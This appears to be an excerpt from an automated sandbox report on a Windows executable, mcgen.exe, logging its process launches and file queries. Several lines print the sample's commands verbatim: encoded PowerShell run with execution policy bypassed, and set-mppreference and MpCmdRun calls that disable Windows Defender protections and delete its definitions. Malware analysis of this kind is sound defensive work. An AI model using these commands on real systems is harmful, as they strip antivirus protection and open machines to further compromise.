jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D1B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,103_2_00007FF695D1B340
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F395E0 cpuid 0_2_00007FF6B9F395E0
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeQueries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformationJump to behavior
